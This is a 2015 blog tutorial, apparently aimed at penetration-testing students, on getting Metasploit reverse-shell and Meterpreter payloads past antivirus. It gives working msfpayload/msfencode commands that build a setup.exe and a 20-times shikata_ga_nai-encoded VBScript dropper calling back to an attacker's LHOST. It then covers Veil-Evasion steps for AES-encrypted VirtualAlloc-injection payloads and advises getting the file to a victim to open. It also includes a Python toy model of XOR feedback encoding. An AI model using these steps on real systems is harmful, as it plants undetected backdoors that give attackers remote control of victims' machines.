Thursday, 20 August 2015

Basic Ways to Bypass Antivirus Software (for CEH / Penetration Testing students)

  • Hello, my name is Chi Cao Hoang. Today I will introduce some basic ways to bypass antivirus software. First of all, a reminder of the rules, so that nobody who reads this tutorial ends up in jail: run these techniques only against systems you are authorized to test.
When it comes to "hacking" a target's system, the part where most of us fail is evading its antivirus.
  • So in this long tutorial I will show you several ways of bypassing antivirus, so that you can get a meterpreter session on the target's system without the AV flagging your binary.
  • Antivirus vendors have traditionally relied on signatures: byte patterns (or whole-file hashes) extracted from known malware and matched against files on disk, wherever in the file they occur. When a new sample is found in the wild, its signature is added to the database, and the next time that sample is seen the software blocks it and alerts the owner. This is why a payload whose bytes the vendor has never seen can slip through, and why a widely shared payload template is caught almost immediately. Modern products add heuristics and runtime behaviour checks on top of signatures, so changing the signature alone is not always enough.
Before we get started here are the Prerequisites :
1. Kali Linux
2. A quick reconnaissance of the victim's AV (which product and version they are running)
Now lets get started !
METHOD 1 : Embedding the Payload in a C Program
In this method we exploit the victim's system by exporting our Metasploit payload as a C byte array and building it into our own program, so the resulting binary is not the stock Metasploit executable that every AV already has a signature for.
STEP 1 : Open up Kali and run msfconsole
STEP 2 : Generate the payload in C
Now we generate the payload as C source. (msfpayload and msfencode were removed from Metasploit in mid-2015 and replaced by msfvenom, which combines both tools; the ideas below carry over unchanged.)
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C
Notice the capital C at the end of the command.
It tells msfpayload to output the payload as a C byte array (an unsigned char buf[] declaration) instead of an executable.
Once we have done that, we get output similar to this:
STEP 3 : Generating a Binary
The C output is meant to be pasted into your own source file and compiled with a C compiler. The msfpayload shortcut for a ready-made executable is the X option:
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 X > setup.exe
This writes the payload into Metasploit's stock executable template and saves it in the current folder as setup.exe. Be aware that this template is the most heavily signatured piece of Metasploit output there is: a bare X-generated executable is flagged by practically every AV, so it is the starting point of this method, not the evasive binary. The evasion comes from compiling the C array into your own loader, which yields an executable the victim's AV is unlikely to have a signature for, allowing us to place the backdoor on the system in a client-side attack.
METHOD 2 : Encoding our Payload
Now we change the payload's signature by encoding it. Let's get started.
STEP 1 : Fire up Kali and run msfconsole
STEP 2 : Using msfencode
Run msfencode -l to list the encoders available to us.
Among the many encoders listed (fourth from the bottom in the screenshot) is one named x86/shikata_ga_nai.
Note that it is rated "excellent" and described as a "Polymorphic XOR Additive Feedback Encoder".
That is the one we will use.
What is shikata_ga_nai?
The name is a Japanese phrase meaning "nothing can be done about it", a fitting name for an encoder. Technically it is a polymorphic XOR additive-feedback encoder: the payload is XORed in 4-byte blocks with a running key, and after each block the key is advanced by adding the decoded block to it, so the keystream depends on the payload itself. A fresh random starting key is chosen on every run, so the encoded bytes look different each time (that is the polymorphism), and a small decoder loop prepended to the blob reverses the process once it runs on the target. XOR is not encryption in any meaningful sense here, since the key travels with the payload, but it is cheap and quickly produces many different-looking blobs. The catch is that the decoder loop itself changes very little between runs, and AV vendors have long since written signatures for it, so a shikata-encoded payload dropped into the default template is usually still caught.
STEP 3 : Re-encoding our Payload with the encoder
Now let's use shikata_ga_nai to re-encode our reverse TCP shell. In the Kali shell (not inside msfconsole) we type:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbs
The R option makes msfpayload emit the raw shellcode bytes, and the pipe "|" feeds those bytes to msfencode on its standard input. LPORT is omitted here, so it defaults to 4444.
msfencode -e x86/shikata_ga_nai -c 20 -t vbs tells msfencode to encode the payload with shikata_ga_nai, apply it 20 times (-c 20, each pass over the output of the previous one), and output the result as a VBScript (-t vbs), a small script that writes the executable to disk and runs it when opened.
Finally the output is redirected into /root under the file name cybrary_it.vbs.

Now when we check our root folder, we find this:
Before sending the file, start a listener that matches the payload (exploit/multi/handler in msfconsole with the same payload, LHOST and LPORT), otherwise the reverse connection has nothing to land on. Then it is just a matter of getting the file to the victim and having them open it, and we have a shell on their system.
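To make the "polymorphic XOR additive feedback" description concrete, here is a toy model of the scheme, written for this page as an added example (it is not Metasploit's encoder, and the names encode, decode, decoder_stub, invariant_part, signature_hits and polymorphic_samples are my own). It encodes a constructed byte string under random keys, shows that every run yields a different blob that a simple byte-pattern signature no longer matches, and shows that the decoder loop in front of the blob is the same every time apart from two constants, which is the part a signature can still catch.

```python
"""Toy XOR additive-feedback encoder, the scheme behind x86/shikata_ga_nai.

Added example, not Metasploit code.  Each 32-bit block of the payload is XORed
with a running key, and the key is then advanced by adding the decoded block to
it (the feedback), so the keystream depends on the payload itself.  A random
starting key gives a different blob on every run (polymorphism), but the
decoder loop that precedes the blob is identical apart from two constants,
which is what AV engines signature.
"""
import os
import struct

MASK32 = 0xFFFFFFFF


def _pad(payload: bytes) -> bytes:
    # Pad to a 4-byte boundary with x86 NOPs so the block loop stays aligned.
    return payload + b"\x90" * (-len(payload) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """Encode `payload` under the 32-bit start `key`; returns the encoded blob."""
    key &= MASK32
    out = bytearray()
    for (block,) in struct.iter_unpack("<I", _pad(payload)):
        out += struct.pack("<I", block ^ key)
        key = (key + block) & MASK32  # feedback: next key depends on the plaintext block
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """What the decoder stub does on the target: same schedule, driven by the decoded block."""
    key &= MASK32
    out = bytearray()
    for (block,) in struct.iter_unpack("<I", blob):
        plain = block ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)


def decoder_stub(key: int, nblocks: int) -> list:
    """Simplified sketch of the x86 decoder loop as mnemonics (constructed; the
    real stub differs in register choice and offsets, which shikata also varies)."""
    return [
        "fldpi",                        # any FPU instruction, so the FPU records its address
        "fnstenv [esp-0xc]",            # store FPU environment; saved FPU IP ends up at [esp]
        "pop esi",                      # esi = address of fldpi (GetPC without a call)
        f"mov eax, 0x{key:08x}",        # start key: per-sample constant
        "xor ecx, ecx",
        f"mov cl, 0x{nblocks:02x}",     # block count: per-sample constant
        "decode: xor [esi+off], eax",   # decode one block in place (off = distance to the blob)
        "add eax, [esi+off]",           # advance the key by the block just decoded
        "add esi, 4",
        "loop decode",
    ]


def invariant_part(stub: list) -> list:
    # Strip the two immediates; what is left is the same in every sample and is signaturable.
    return [line for line in stub if not line.startswith("mov ")]


def signature_hits(blob: bytes, signature: bytes) -> bool:
    # The simplest static AV check there is: byte-pattern substring match.
    return signature in blob


def polymorphic_samples(payload: bytes, count: int) -> list:
    """`count` encodings of the same payload, each under a fresh random key."""
    samples = []
    for _ in range(count):
        key = int.from_bytes(os.urandom(4), "little")
        samples.append((key, encode(payload, key)))
    return samples


# Constructed stand-in for a payload (plain ascending bytes, not real shellcode)
# and a byte pattern an AV might key on.
SAMPLE_PAYLOAD = bytes(range(0x20, 0x40))
SIGNATURE = SAMPLE_PAYLOAD[:8]

if __name__ == "__main__":
    for key, blob in polymorphic_samples(SAMPLE_PAYLOAD, 3):
        assert decode(blob, key) == SAMPLE_PAYLOAD
        print(f"key {key:08x}: {blob.hex()}  signature hit: {signature_hits(blob, SIGNATURE)}")
    a, b = decoder_stub(0x11111111, 8), decoder_stub(0x22222222, 8)
    print("decoder loop identical across samples:", invariant_part(a) == invariant_part(b))
```

The -c 20 in the msfencode command corresponds to calling encode twenty times, each pass over the previous pass's output (decoder loop included) with its own key; every pass prepends another decoder loop, so the signaturable part grows with the iteration count rather than shrinking.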

METHOD 3 : Using Veil-Evasion

  • In this final method (of this tutorial; I cannot post all 50 methods) we will evade the AV one more time, using Veil-Evasion.
  • Veil-Evasion was developed specifically to change the signature of a payload. It is written in Python and ships with a range of payload templates and obfuscation options (encoders, encrypters and several injection methods, in more than one language), so the same shellcode can be rewritten to evade detection in multiple ways.
STEP 1 : Installing Veil-Evasion
First we install it:
root@kali > apt-get install veil-evasion
STEP 2 : Opening Veil-Evasion
To open the freshly installed Veil-Evasion, just type:
root@kali > veil-evasion
When we type that, we get this:
Veil will now begin its own setup.
It asks whether you want to install dependencies; type Y for yes. Veil-Evasion then downloads all its dependencies, which can take a while, so be patient. Eventually it asks whether you want to install Python for Windows (Veil runs it under Wine on Kali in order to build Windows executables). Select "Install for all users", click "Next" through the remaining screens and then click "Finish". You will then arrive at the screen below, and we are ready to use Veil-Evasion to create a payload with a much lower chance of being detected.

STEP 3 : Creating an EXE Payload

Let's type "list" to see all of the payloads that Veil-Evasion can generate.


STEP 4 : Choosing a Payload
In this case let's use ruby/meterpreter/rev_tcp, number 44 in the list (the numbering depends on your Veil version, so read it off your own list rather than typing 44 blindly).
Let's type: > use 44
When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.
We will need to set LHOST and LPORT.
> set LHOST 192.168.1.101
> set LPORT 4444
Of course, use the appropriate IP address and port for your circumstances.

Next, we tell Veil-Evasion to build the executable:
> generate
As you can see in the screenshot above, Veil-Evasion has generated a new .exe file, which I named "newpayload.exe".

STEP 5 : Generating an encrypted Payload to bypass AV

  • Next, let's create an encrypted payload to get past AV software and other security devices. This time we use a different entry from the payload list, namely python/shellcode_inject/aes_encrypt.
  • This payload type uses VirtualAlloc injection: at run time it allocates a readable, writable and executable region with VirtualAlloc, copies the decrypted shellcode into it and starts it on a new thread (Veil's template does this with RtlMoveMemory and CreateThread). Nothing is locked into physical memory; the region simply has to be executable for the shellcode to run.
  • This is number 32 on our payload list, so type: > info 32 It returns the payload's details, as seen below.
Here the shellcode is stored AES-encrypted inside the generated Python script and decrypted just before injection. Do not read too much into the AES: the key is embedded in the same script, so it protects nothing from a reverse engineer. Its only job is to make sure the shellcode bytes never appear in the clear on disk, so that static scanners cannot match them; the decrypt-and-inject stub remains visible, and it, not the cipher, decides whether the sample gets flagged.


  • Next, let's tell Veil-Evasion that we want to use this payload: > use 32
Here we have the option to change the default options if we want to. For now, let's leave them as they are.

  • Next, let's tell Veil-Evasion to generate this encrypted payload: > generate

When we do so, it uses the default shellcode, windows/meterpreter/reverse_tcp, and prompts us for LHOST and LPORT.

When we finish entering the appropriate information for our payload, it will begin to generate the shellcode.
This can take a few minutes, so be patient. Next, Veil-Evasion prompts us for a name for the payload. Use whatever name you like; I used the simple "veilpayload".

Finally, Veil-Evasion completes its work and presents us with the finished product, as we see below.
There are many ways to bypass AV; these are the ones my team and I use most. If you get stuck on any of them, or have suggestions, complaints or questions, feel free to message me.
Read more at: hoangcaochi.blogspot.com
